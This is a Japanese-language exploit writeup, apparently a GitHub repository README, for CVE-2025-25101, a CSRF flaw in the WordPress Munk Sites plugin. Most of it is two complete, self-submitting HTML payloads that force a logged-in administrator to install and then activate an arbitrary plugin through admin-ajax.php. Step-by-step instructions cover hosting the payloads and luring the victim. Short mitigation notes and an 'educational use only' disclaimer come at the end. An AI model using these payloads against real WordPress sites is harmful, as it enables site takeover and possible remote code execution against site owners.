
WordPress Munk Sites plugin <= 1.0.7 - CSRF による任意のプラグインインストールの脆弱性
CVE-2025-25101 は、WordPress 用 MetricThemes Munk Sites プラグイン (バージョン 1.0.7 以下) における クロスサイトリクエストフォージェリ (CSRF) の脆弱性です。
この脆弱性により、認証されていない攻撃者 が 管理者を騙して任意のプラグインをインストールおよび有効化させ、潜在的に リモートコード実行 (RCE) や ウェブサイトの侵害 につながる可能性があります。
<= 1.0.7プラグインが有効なすべてのバージョン| スコア | 深刻度 | バージョン | ベクター文字列 |
|---|---|---|---|
| 9.6 | 🔥 CRITICAL | 3.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
Munk Sites プラグインの CSRF の欠陥 により、攻撃者はログイン中の WordPress 管理者 に、同意なしに任意の WordPress プラグインをインストールおよび有効化させることができます。
これは、CSRF トークン検証が欠如している 保護されていない admin-ajax.php リクエスト を悪用することで行われます。
このペイロードは被害者に hello-world プラグインをインストールさせます。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Installation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #5bc0de; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>📌 CVE-2025-25101</h1>
<h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
<h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">🔄 Installing plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_install_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>
このペイロードは被害者に hello-world プラグインを有効化させます。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Activation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #f0ad4e; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>📌 CVE-2025-25101</h1>
<h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
<h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">🔄 Activating plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_active_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>
install.html と activate.html) を攻撃者が管理するサーバーにホストします。install.html にアクセスさせます。activate.html にアクセスするように誘導します。hello-world プラグインが管理者の同意なしにインストールおよび有効化されます!.htaccess や Nginx 設定のセキュリティルールを使用して、admin-ajax.php へのアクセスを制限する。wp_nonce_field() と check_admin_referer() を使用して CSRF 保護を実装する。⚠️ このエクスプロイトは教育およびセキュリティ研究目的のみです。
⚠️ 明示的な許可なくシステムに対して不正に使用することは違法です。
⚠️ 作成者はこのコードの誤用について一切の責任を負いません。
この研究が価値あると感じたら、リポジトリに ⭐ スターを付けて、新しい脆弱性 を報告することで貢献してください。
作成者: Nxploit | Khaled Alenazi